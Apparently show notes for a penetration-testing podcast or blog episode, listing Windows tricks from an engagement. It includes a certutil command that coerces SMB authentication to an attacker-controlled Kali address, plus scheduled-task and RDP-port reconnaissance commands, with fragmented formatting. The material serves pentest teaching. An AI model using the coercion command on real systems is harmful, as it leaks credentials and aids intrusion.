Jul 12, 2024
Today’s tale of pentest pwnage includes some fun stuff, including:
ping -n 1
your.kali.ip.address
. When you’re ready to fire off a
task that coerces SMB auth, try certutil -syncwithWU
\\your.kali.ip.address\arbitrary-folder
.Get-ScheduledTask -taskname
"name" | select *
to get information about what context
the attack is running under.Get-ItemProperty -path
"HKLM:\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp | select-object portnumber`
And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!